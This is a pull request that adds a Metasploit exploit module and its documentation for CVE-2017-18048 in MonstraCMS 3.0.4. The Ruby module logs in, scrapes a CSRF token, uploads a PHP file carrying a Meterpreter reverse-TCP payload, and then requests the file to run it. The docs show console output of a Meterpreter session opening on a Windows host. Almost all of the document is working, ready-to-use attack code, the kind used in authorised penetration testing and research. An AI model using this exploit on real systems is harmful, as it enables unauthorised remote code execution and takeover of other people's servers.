### PR TITLE
Monstra fileupload exec

### DIFF
--- a/documentation/modules/exploit/multi/http/monstra_fileupload_exec.md
+++ b/documentation/modules/exploit/multi/http/monstra_fileupload_exec.md
@@ -1,0 +1,40 @@
+## Description
+MonstraCMS 3.0.4 allows users to upload Arbitrary files which leads to a remote command execution on the remote server, an attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file.
+This module was tested against MonstraCMS 3.0.4.
+Additional information and vulnerabilities can be viewed on Exploit-DB [43348](https://www.exploit-db.com/exploits/43348/).
+
+## Vulnerable Application 
+Available at [Exploit-DB](https://www.exploit-db.com/apps/23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip)
+
+### Vulnerable Application Installation Setup.
+ 1. Download Application : `https://www.exploit-db.com/apps/23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip`
+ 2. Extract : `23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip`
+ 3. Move In WebDirectory : `C:\xampp\htdocs\`
+ 4. Now Visit : http://localhost/
+ 8. Setup DB creds and other thins which is essential for Monstra CMS.
+
+## Verification Steps
+
+ 1. Install the application
+ 2. Start msfconsole
+ 3. Do: `use exploit/multi/http/monstra_fileupload_exec`
+ 4. Do: `set rport <port>`
+ 5. Do: `set rhost <ip>`
+ 6. Do: `set targeturi monstra`
+ 7. Do: `set username root`
+ 8. Do: `set password password`
+ 9. Do: `check`
+```
+[*] 10.22.1.10:80 The target appears to be vulnerable.
+```
+ 10. Do: `set lport <port>`
+ 11. Do: `set lhost <ip>`
+ 12. Do: `exploit`
+ 13. You should get a shell.
+
+
+## Scenarios
+### Monstra CMS on Windows Target
+```                                                                                                                                    
+meterpreter >
+```

--- a/documentation/modules/exploit/multi/http/monstra_fileupload_exec.md
+++ b/documentation/modules/exploit/multi/http/monstra_fileupload_exec.md
@@ -11,7 +11,6 @@ Available at [Exploit-DB](https://www.exploit-db.com/apps/23663fc7b47c4c1e476b79
  2. Extract : `23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip`
  3. Move In WebDirectory : `C:\xampp\htdocs\`
  4. Now Visit : http://localhost/
- 8. Setup DB creds and other thins which is essential for Monstra CMS.
 
 ## Verification Steps
 
@@ -21,11 +20,12 @@ Available at [Exploit-DB](https://www.exploit-db.com/apps/23663fc7b47c4c1e476b79
  4. Do: `set rport <port>`
  5. Do: `set rhost <ip>`
  6. Do: `set targeturi monstra`
- 7. Do: `set username root`
- 8. Do: `set password password`
+ 7. Do: `set username USERNAME`
+ 8. Do: `set password PASSWORD`
  9. Do: `check`
 ```
-[*] 10.22.1.10:80 The target appears to be vulnerable.
+[*] Monstra CMS: 3.0.4
+[+] 192.168.0.101:80 The target is vulnerable.
 ```
  10. Do: `set lport <port>`
  11. Do: `set lhost <ip>`
@@ -36,5 +36,25 @@ Available at [Exploit-DB](https://www.exploit-db.com/apps/23663fc7b47c4c1e476b79
 ## Scenarios
 ### Monstra CMS on Windows Target
 ```                                                                                                                                    
-meterpreter >
+msf exploit(multi/http/monstra_fileupload_exec) > check 
+
+[*] Monstra CMS: 3.0.4
+[+] 192.168.0.101:80 The target is vulnerable.
+msf exploit(multi/http/monstra_fileupload_exec) > exploit 
+
+[*] Started bind handler
+[*] Trying to Login ......
+[+] Authentication successful : [ editor : editor ]
+[+] CSRF-Token for File Upload : 2a67a7995c15c69a158d897f517e3aff2e3a4ae9
+[*] Trying to upload file with malicious Content....
+[*] Executing Payload 
+[*] Sending stage (37775 bytes) to 192.168.0.101
+[*] Meterpreter session 1 opened (10.0.2.15:45689 -> 192.168.0.101:4444) at 2018-06-30 12:39:53 +0530
+[+] Deleted TSPfeLYdMP.PHP
+
+meterpreter > sysinfo 
+Computer    : 114619-T470P
+OS          : Windows NT 114619-T470P 10.0 build 16299 (Windows 10) AMD64
+Meterpreter : php/windows
+meterpreter > 
 ```

--- a/modules/exploits/multi/http/monstra_fileupload_exec.rb
+++ b/modules/exploits/multi/http/monstra_fileupload_exec.rb
@@ -1,0 +1,184 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+    Rank = ExcellentRanking
+
+    include Msf::Exploit::Remote::HttpClient
+    include Msf::Exploit::FileDropper
+
+    def initialize(info = {})
+        super(update_info(info,
+            'Name' => 'Monstra CMS - Authenticated  Arbitrary File Upload / Remote Code Execution',
+            'Description' => %q{
+            MonstraCMS 3.0.4 allows users to upload Arbitrary files which leads to a remote command execution on the remote server,
+            an attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file.
+
+            This module was tested against MonstraCMS 3.0.4.
+        },
+        'Author' =>
+        [
+            'Ishaq Mohammed <shaikhishaq201@gmail.com>', # Discoverys
+            'Touhid M.Shaikh <touhidshaikh22@gmail.com>', # Metasploit Module
+          
+        ],
+        'License' => MSF_LICENSE,
+        'References' =>
+        [
+            ['CVE','2017-18048'],
+            ['EDB','43348'],
+            ['URL','https://blogs.securiteam.com/index.php/archives/3559'],
+            ['URL','https://securityprince.blogspot.com/2017/12/monstra-cms-304-arbitrary-file-upload.html?m=1'],
+            ['URL','https://www.youtube.com/watch?v=-ziZ6DELbzw']
+        ],
+       'DefaultOptions' =>
+          {
+            'SSL'     => false,
+            'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+            'Encoder' => 'php/base64'
+          },
+        'Privileged' => false,
+        'Platform'   => ['php'],
+        'Arch'       => ARCH_PHP,
+        'Targets' =>
+        [
+          ['Monstra CMS 3.0.4', { }],
+        ],
+        'DefaultTarget'  => 0,
+        'DisclosureDate' => 'Dec 18 2017'))
+
+        register_options(
+        [
+          OptString.new('TARGETURI', [ true, "Base Monstra CMS directory path", '/']),
+          OptString.new('USERNAME', [ true, "Username to authenticate with", 'root']),
+          OptString.new('PASSWORD', [ true, "Password to authenticate with", 'password'])
+        ])
+
+    end
+
+  def check
+    res = nil
+    begin
+      res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,'admin', 'index.php') })
+    rescue
+      vprint_error("Unable to access the index.php file")
+      return CheckCode::Unknown
+    end
+
+    if res and res.code != 200
+      vprint_error("Error accessing the index.php file")
+      return CheckCode::Unknown
+    end
+
+    if res.body =~ /<\/a> – Version (.*.4)/i
+      vprint_status("Monstra CMS: " + $1)
+    
+      if $1 == '3.0.4'
+	      return CheckCode::Vulnerable
+      else
+        return CheckCode::Detected
+      end
+    end
+  end
+
+    def uri
+        return target_uri.path
+    end
+
+    def login
+        res = nil
+        vprint_status('Trying to Login ......')
+        # Send Creds with cookies.
+        res = send_request_cgi({
+          'method' => 'POST',
+          'uri' => normalize_uri(uri, 'admin', 'index.php'),
+          'vars_post' => {
+            'login' => datastore['USERNAME'],
+            'password' => datastore['PASSWORD'],
+            'login_submit' => 'Log+In',
+          },
+        })
+        cookies = res.get_cookies
+
+        fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
+    
+        # Try to access index page with authenticated cookie.
+        res = send_request_cgi({
+          'method' => 'GET',
+          'uri' => normalize_uri(uri, 'admin' '/index.php'),
+          'cookie' => cookies,
+
+        })
+        
+        fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
+    
+        # if we redirect to core_welcome dan we assume we have authenticated cookie.
+        if res.code == 302 && res.headers['Location'].include?('index.php?id=dashboard')
+          print_good("Authentication successful : [ #{datastore['USERNAME']} : #{datastore['PASSWORD']} ]")
+          store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
+          return cookies
+        else
+          fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]")
+        end
+    end
+
+
+    def exploit
+       
+	#Login Function Execute and Return Cookies
+        cookies = login
+
+	#Random payload name.
+        pay_name = rand_text_alpha(rand(5..10)) + ".PHP"	
+    
+
+        # Payload Gen.
+        evilbyte = "<?php #{payload.encode}; ?>"
+
+        # Request for CSRF token for file upload.
+        res = send_request_cgi({
+          'uri' => normalize_uri(uri, 'admin', '/index.php?id=filesmanager'),
+          'method' => 'GET',
+          'cookie' => cookies,
+        })
+     
+        # Grabbing CSRF token from body
+        /<input type="hidden" id="csrf" name="csrf" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
+        fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
+        vprint_good("CSRF-Token for File Upload : #{csrf}")
+
+        
+    
+        # setup POST request.
+        post_data = Rex::MIME::Message.new
+        post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="csrf"') # CSRF token #form-data; name="file"; filename="agent22.PHP"
+        post_data.add_part("#{evilbyte}", content_type = 'application/x-php', transfer_encoding = nil, content_disposition = "form-data; name=\"file\"; filename=\"#{pay_name}\"")  # payload
+        post_data.add_part("Upload", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="upload_file"')  # extra
+        data = post_data.to_s
+    
+        vprint_status('Trying to upload file with malicious Content....')
+        # Lets Send Upload request.
+        res = send_request_cgi({
+          'uri' => normalize_uri(uri, 'admin', '/index.php?id=filesmanager'),
+          'method' => 'POST',
+          'cookie' => cookies,
+          'Connection' => 'close',
+          'data' => data,
+          'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+        })
+
+	# Cleanup delete payload after get meterpreter.
+        register_files_for_cleanup(pay_name)
+
+
+        # Execute our payload simply call to payload.
+        print_status("Executing Payload " )
+        res = send_request_cgi({
+          'method' => 'GET',
+          'uri'    => normalize_uri(uri, 'public', 'uploads', pay_name)
+        })
+
+      end
+    end

--- a/modules/exploits/multi/http/monstra_fileupload_exec.rb
+++ b/modules/exploits/multi/http/monstra_fileupload_exec.rb
@@ -134,7 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Request for CSRF token for file upload.
     res = send_request_cgi({
       'uri' => normalize_uri(uri, 'admin', '/index.php'),
-      'vars_get' => 'id=filesmanager'
+      'vars_get' => 'id=filesmanager',
       'method' => 'GET',
       'cookie' => cookies,
     })
@@ -155,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Lets Send Upload request.
     res = send_request_cgi({
       'uri' => normalize_uri(uri, 'admin', '/index.php'),
-      'vars_get' => 'id=filesmanager'
+      'vars_get' => 'id=filesmanager',
       'method' => 'POST',
       'cookie' => cookies,
       'Connection' => 'close',

--- a/modules/exploits/multi/http/monstra_fileupload_exec.rb
+++ b/modules/exploits/multi/http/monstra_fileupload_exec.rb
@@ -4,34 +4,33 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-    Rank = ExcellentRanking
+  Rank = ExcellentRanking
 
-    include Msf::Exploit::Remote::HttpClient
-    include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
 
-    def initialize(info = {})
-        super(update_info(info,
-            'Name' => 'Monstra CMS - Authenticated  Arbitrary File Upload / Remote Code Execution',
-            'Description' => %q{
-            MonstraCMS 3.0.4 allows users to upload Arbitrary files which leads to a remote command execution on the remote server,
-            an attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file.
-
-            This module was tested against MonstraCMS 3.0.4.
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Monstra CMS - Authenticated  Arbitrary File Upload / Remote Code Execution',
+      'Description' => %q{
+        MonstraCMS 3.0.4 allows users to upload Arbitrary files which leads to a remote command execution on the remote server,
+        an attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file.
+        This module was tested against MonstraCMS 3.0.4.
         },
+
         'Author' =>
         [
-            'Ishaq Mohammed <shaikhishaq201@gmail.com>', # Discoverer & Proof of Concept
-            'Touhid M.Shaikh <touhidshaikh22@gmail.com>', # Metasploit Module
-          
+          'Ishaq Mohammed <shaikhishaq201@gmail.com>', # Discoverer & Proof of Concept
+          'Touhid M.Shaikh <touhidshaikh22@gmail.com>', # Metasploit Module
         ],
         'License' => MSF_LICENSE,
         'References' =>
         [
-            ['CVE','2017-18048'],
-            ['EDB','43348'],
-            ['URL','https://blogs.securiteam.com/index.php/archives/3559'],
-            ['URL','https://securityprince.blogspot.com/2017/12/monstra-cms-304-arbitrary-file-upload.html?m=1'],
-            ['URL','https://www.youtube.com/watch?v=-ziZ6DELbzw']
+          ['CVE','2017-18048'],
+          ['EDB','43348'],
+          ['URL','https://blogs.securiteam.com/index.php/archives/3559'],
+          ['URL','https://securityprince.blogspot.com/2017/12/monstra-cms-304-arbitrary-file-upload.html?m=1'],
+          ['URL','https://www.youtube.com/watch?v=-ziZ6DELbzw']
         ],
        'DefaultOptions' =>
           {
@@ -55,11 +54,9 @@ class MetasploitModule < Msf::Exploit::Remote
           OptString.new('USERNAME', [ true, "Username to authenticate with", '']),
           OptString.new('PASSWORD', [ true, "Password to authenticate with", ''])
         ])
-
     end
 
   def check
-    res = nil
     begin
       res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,'admin', 'index.php') })
     rescue
@@ -72,113 +69,111 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown
     end
 
-    if res.body =~ /<\/a> – Version (.*.4)/i
-      vprint_status("Monstra CMS: " + $1)
+    if res.body =~ /<\/a> - Version (\d+\.\d+\.\d+)/i
+      version = Gem::Version.new($1)
+      vprint_status("Monstra CMS: #{version}")
     
-      if $1 == '3.0.4'
+      if version == '3.0.4'
 	      return CheckCode::Vulnerable
       else
-        return CheckCode::Detected
+        return CheckCode::Safe
       end
     end
   end
 
-    def uri
-        return target_uri.path
-    end
+  def uri
+    return target_uri.path
+  end
 
-    def login
-        res = nil
-        vprint_status('Trying to Login ......')
-        # Send Creds with cookies.
-        res = send_request_cgi({
-          'method' => 'POST',
-          'uri' => normalize_uri(uri, 'admin', 'index.php'),
-          'vars_post' => {
-            'login' => datastore['USERNAME'],
-            'password' => datastore['PASSWORD'],
-            'login_submit' => 'Log+In',
-          },
-        })
-        cookies = res.get_cookies
+  def login
+    res = nil
+    vprint_status('Trying to Login ......')
+    # Send Creds with cookies.
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(uri, 'admin', 'index.php'),
+      'vars_post' => {
+        'login' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        'login_submit' => 'Log+In',
+      },
+    })
+    cookies = res.get_cookies
 
-        fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
+    fail_with(Failure::Unreachable, "#{peer} - Did not respond to Login request") if res.nil?
+
+    # Try to access index page with authenticated cookie.
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(uri, 'admin' '/index.php'),
+      'cookie' => cookies,
+    })
     
-        # Try to access index page with authenticated cookie.
-        res = send_request_cgi({
-          'method' => 'GET',
-          'uri' => normalize_uri(uri, 'admin' '/index.php'),
-          'cookie' => cookies,
+    fail_with(Failure::Unreachable, "#{peer} - Did not respond to Login request") if res.nil?
 
-        })
-        
-        fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?
-    
-        # if we redirect to core_welcome dan we assume we have authenticated cookie.
-        if res.code == 302 && res.headers['Location'].include?('index.php?id=dashboard')
-          print_good("Authentication successful : [ #{datastore['USERNAME']} : #{datastore['PASSWORD']} ]")
-          store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
-          return cookies
-        else
-          fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]")
-        end
+    # if we redirect to core_welcome dan we assume we have authenticated cookie.
+    if res.code == 302 && res.headers['Location'].include?('index.php?id=dashboard')
+      print_good("Authentication successful : [ #{datastore['USERNAME']} : #{datastore['PASSWORD']} ]")
+      store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
+      return cookies
+    else
+      fail_with(Failure::Unreachable, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]")
     end
+  end
 
-
-    def exploit
+  def exploit
        
-	#Login Function Execute and Return Cookies
-        cookies = login
+  	#Login Function Execute and Return Cookies
+    cookies = login
 
-	#Random payload name.
-        pay_name = rand_text_alpha(rand(5..10)) + ".PHP"	
-    
-
-        # Payload Gen.
-        evilbyte = "<?php #{payload.encode}; ?>"
-
-        # Request for CSRF token for file upload.
-        res = send_request_cgi({
-          'uri' => normalize_uri(uri, 'admin', '/index.php?id=filesmanager'),
-          'method' => 'GET',
-          'cookie' => cookies,
-        })
-     
-        # Grabbing CSRF token from body
-        /<input type="hidden" id="csrf" name="csrf" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
-        fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
-        vprint_good("CSRF-Token for File Upload : #{csrf}")
-
-        
-    
-        # setup POST request.
-        post_data = Rex::MIME::Message.new
-        post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="csrf"') # CSRF token #form-data; name="file"; filename="agent22.PHP"
-        post_data.add_part("#{evilbyte}", content_type = 'application/x-php', transfer_encoding = nil, content_disposition = "form-data; name=\"file\"; filename=\"#{pay_name}\"")  # payload
-        post_data.add_part("Upload", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="upload_file"')  # extra
-        data = post_data.to_s
-    
-        vprint_status('Trying to upload file with malicious Content....')
-        # Lets Send Upload request.
-        res = send_request_cgi({
-          'uri' => normalize_uri(uri, 'admin', '/index.php?id=filesmanager'),
-          'method' => 'POST',
-          'cookie' => cookies,
-          'Connection' => 'close',
-          'data' => data,
-          'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
-        })
-
-	# Cleanup delete payload after get meterpreter.
-        register_files_for_cleanup(pay_name)
+  	#Random payload name.
+    pay_name = rand_text_alpha(rand(5..10)) + ".PHP"	
 
 
-        # Execute our payload simply call to payload.
-        print_status("Executing Payload " )
-        res = send_request_cgi({
-          'method' => 'GET',
-          'uri'    => normalize_uri(uri, 'public', 'uploads', pay_name)
-        })
+    # Payload Gen.
+    evilbyte = "<?php #{payload.encode}; ?>"
 
-      end
-    end
+    # Request for CSRF token for file upload.
+    res = send_request_cgi({
+      'uri' => normalize_uri(uri, 'admin', '/index.php'),
+      'vars_get' => 'id=filesmanager'
+      'method' => 'GET',
+      'cookie' => cookies,
+    })
+
+    # Grabbing CSRF token from body
+    /<input type="hidden" id="csrf" name="csrf" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
+    fail_with(Failure::Unreachable, "#{peer} - Could not determine CSRF token") if csrf.nil?
+    vprint_good("CSRF-Token for File Upload : #{csrf}")
+
+    # setup POST request.
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="csrf"') # CSRF token #form-data; name="file"; filename="agent22.PHP"
+    post_data.add_part("#{evilbyte}", content_type = 'application/x-php', transfer_encoding = nil, content_disposition = "form-data; name=\"file\"; filename=\"#{pay_name}\"")  # payload
+    post_data.add_part("Upload", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="upload_file"')  # extra
+    data = post_data.to_s
+
+    vprint_status('Trying to upload file with malicious Content....')
+    # Lets Send Upload request.
+    res = send_request_cgi({
+      'uri' => normalize_uri(uri, 'admin', '/index.php?id=filesmanager'),
+      'method' => 'POST',
+      'cookie' => cookies,
+      'Connection' => 'close',
+      'data' => data,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+    })
+
+    # Cleanup delete payload after get meterpreter.
+    register_files_for_cleanup(pay_name)
+
+
+    # Execute our payload simply call to payload.
+    print_status("Executing Payload " )
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(uri, 'public', 'uploads', pay_name)
+    })
+
+  end
+end

--- a/modules/exploits/multi/http/monstra_fileupload_exec.rb
+++ b/modules/exploits/multi/http/monstra_fileupload_exec.rb
@@ -72,9 +72,9 @@ class MetasploitModule < Msf::Exploit::Remote
     if res.body =~ /<\/a> - Version (\d+\.\d+\.\d+)/i
       version = Gem::Version.new($1)
       vprint_status("Monstra CMS: #{version}")
-    
+
       if version == '3.0.4'
-	      return CheckCode::Vulnerable
+      return CheckCode::Vulnerable
       else
         return CheckCode::Safe
       end
@@ -108,7 +108,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(uri, 'admin' '/index.php'),
       'cookie' => cookies,
     })
-    
     fail_with(Failure::Unreachable, "#{peer} - Did not respond to Login request") if res.nil?
 
     # if we redirect to core_welcome dan we assume we have authenticated cookie.
@@ -122,12 +121,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-       
-  	#Login Function Execute and Return Cookies
+    #Login Function Execute and Return Cookies
     cookies = login
 
-  	#Random payload name.
-    pay_name = rand_text_alpha(rand(5..10)) + ".PHP"	
+    #Random payload name.
+    pay_name = rand_text_alpha(rand(5..10)) + ".PHP"
 
 
     # Payload Gen.
@@ -156,7 +154,8 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status('Trying to upload file with malicious Content....')
     # Lets Send Upload request.
     res = send_request_cgi({
-      'uri' => normalize_uri(uri, 'admin', '/index.php?id=filesmanager'),
+      'uri' => normalize_uri(uri, 'admin', '/index.php'),
+      'vars_get' => 'id=filesmanager'
       'method' => 'POST',
       'cookie' => cookies,
       'Connection' => 'close',

--- a/modules/exploits/multi/http/monstra_fileupload_exec.rb
+++ b/modules/exploits/multi/http/monstra_fileupload_exec.rb
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Author' =>
         [
-            'Ishaq Mohammed <shaikhishaq201@gmail.com>', # Discoverys
+            'Ishaq Mohammed <shaikhishaq201@gmail.com>', # Discoverer & Proof of Concept
             'Touhid M.Shaikh <touhidshaikh22@gmail.com>', # Metasploit Module
           
         ],

--- a/modules/exploits/multi/http/monstra_fileupload_exec.rb
+++ b/modules/exploits/multi/http/monstra_fileupload_exec.rb
@@ -69,11 +69,11 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown
     end
 
-    if res.body =~ /<\/a> - Version (\d+\.\d+\.\d+)/i
+    if res.body =~ /<\/a>.*?Version (\d+\.\d+\.\d+)/i
       version = Gem::Version.new($1)
       vprint_status("Monstra CMS: #{version}")
 
-      if version == '3.0.4'
+      if version.to_s == '3.0.4'
       return CheckCode::Vulnerable
       else
         return CheckCode::Safe
@@ -95,8 +95,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_post' => {
         'login' => datastore['USERNAME'],
         'password' => datastore['PASSWORD'],
-        'login_submit' => 'Log+In',
-      },
+        'login_submit' => 'Log+In'
+      }
     })
     cookies = res.get_cookies
 
@@ -106,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(uri, 'admin' '/index.php'),
-      'cookie' => cookies,
+      'cookie' => cookies
     })
     fail_with(Failure::Unreachable, "#{peer} - Did not respond to Login request") if res.nil?
 
@@ -134,9 +134,9 @@ class MetasploitModule < Msf::Exploit::Remote
     # Request for CSRF token for file upload.
     res = send_request_cgi({
       'uri' => normalize_uri(uri, 'admin', '/index.php'),
-      'vars_get' => 'id=filesmanager',
+      'vars_get' => {'id' => 'filesmanager'},
       'method' => 'GET',
-      'cookie' => cookies,
+      'cookie' => cookies
     })
 
     # Grabbing CSRF token from body
@@ -155,12 +155,12 @@ class MetasploitModule < Msf::Exploit::Remote
     # Lets Send Upload request.
     res = send_request_cgi({
       'uri' => normalize_uri(uri, 'admin', '/index.php'),
-      'vars_get' => 'id=filesmanager',
+      'vars_get' => {'id' => 'filesmanager'},
       'method' => 'POST',
       'cookie' => cookies,
       'Connection' => 'close',
       'data' => data,
-      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
     })
 
     # Cleanup delete payload after get meterpreter.

--- a/modules/exploits/multi/http/monstra_fileupload_exec.rb
+++ b/modules/exploits/multi/http/monstra_fileupload_exec.rb
@@ -52,8 +52,8 @@ class MetasploitModule < Msf::Exploit::Remote
         register_options(
         [
           OptString.new('TARGETURI', [ true, "Base Monstra CMS directory path", '/']),
-          OptString.new('USERNAME', [ true, "Username to authenticate with", 'root']),
-          OptString.new('PASSWORD', [ true, "Password to authenticate with", 'password'])
+          OptString.new('USERNAME', [ true, "Username to authenticate with", '']),
+          OptString.new('PASSWORD', [ true, "Password to authenticate with", ''])
         ])
 
     end


### PR DESCRIPTION
## Description
MonstraCMS 3.0.4 allows users to upload Arbitrary files which leads to a remote command execution on the remote server, an attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file.
This module was tested against MonstraCMS 3.0.4.
Additional information and vulnerabilities can be viewed on Exploit-DB [43348](https://www.exploit-db.com/exploits/43348/).

## Vulnerable Application 
Available at [Exploit-DB](https://www.exploit-db.com/apps/23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip)

### Vulnerable Application Installation Setup.
 1. Download Application : `https://www.exploit-db.com/apps/23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip`
 2. Extract : `23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip`
 3. Move In WebDirectory : `C:\xampp\htdocs\`
 4. Now Visit : http://localhost/
 8. Setup DB creds and other thins which is essential for Monstra CMS.

## Verification Steps

 1. Install the application
 2. Start msfconsole
 3. Do: `use exploit/multi/http/monstra_fileupload_exec`
 4. Do: `set rport <port>`
 5. Do: `set rhost <ip>`
 6. Do: `set targeturi monstra`
 7. Do: `set username USERNAME`
 8. Do: `set password PASSWORD`
 9. Do: `check`
```
[*] Monstra CMS: 3.0.4
[+] 192.168.0.101:80 The target is vulnerable.
```
 10. Do: `set lport <port>`
 11. Do: `set lhost <ip>`
 12. Do: `exploit`
 13. You should get a shell.


## Scenarios
### Monstra CMS on Windows Target
```                                                                                                                                    
msf exploit(multi/http/monstra_fileupload_exec) > check 

[*] Monstra CMS: 3.0.4
[+] 192.168.0.101:80 The target is vulnerable.
msf exploit(multi/http/monstra_fileupload_exec) > exploit 

[*] Started bind handler
[*] Trying to Login ......
[+] Authentication successful : [ editor : editor ]
[+] CSRF-Token for File Upload : 2a67a7995c15c69a158d897f517e3aff2e3a4ae9
[*] Trying to upload file with malicious Content....
[*] Executing Payload 
[*] Sending stage (37775 bytes) to 192.168.0.101
[*] Meterpreter session 1 opened (10.0.2.15:45689 -> 192.168.0.101:4444) at 2018-06-30 12:39:53 +0530
[+] Deleted TSPfeLYdMP.PHP

meterpreter > sysinfo 
Computer    : 114619-T470P
OS          : Windows NT 114619-T470P 10.0 build 16299 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter > 
```